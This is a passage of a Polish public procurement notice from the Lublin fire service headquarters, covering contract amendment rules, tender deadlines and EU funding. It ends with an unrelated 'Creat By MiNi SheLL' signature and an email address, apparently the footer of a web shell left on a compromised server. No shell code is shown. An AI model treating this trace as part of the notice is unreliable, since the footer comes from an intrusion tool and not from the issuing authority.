3.Zmiana umowy będzie uwarunkowana doręczeniem Zamawiającemu przez Wykonawcę lub odpowiednio Wykonawcy przez Zamawiającego pisemnego zawiadomienia informującego o wystąpieniu zdarzenia uzasadniającego zmianę umowy w terminie nie później niż 7 dni od dnia, w którym Wykonawca lub odpowiednio Zamawiający dowiedział się o wystąpieniu określonego zdarzenia. 
4. Każda zmiana postanowień umowy wymaga zachowania formy pisemnej pod rygorem nieważności takiej zmiany i może zostać wprowadzona, jedynie w przypadku jeżeli obydwie Strony umowy  (Zamawiający i Wykonawca) zgodnie uznają, że zaszły okoliczności uzasadniające zmianę oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kwpsp-lublin.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin 
p. 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 09:00, miejsce: Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa realizowana jest  w ramach projektu pn. Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz 
z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne. 
Projekt realizowany jest w ramach Osi Priorytetowej III Atrakcyjność obszarów miejskich i tereny inwestycyjne, Działania 3.2. Rewitalizacja zdegradowanych obszarów miejskich Regionalnego Programu Operacyjnego Województwa  Lubelskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com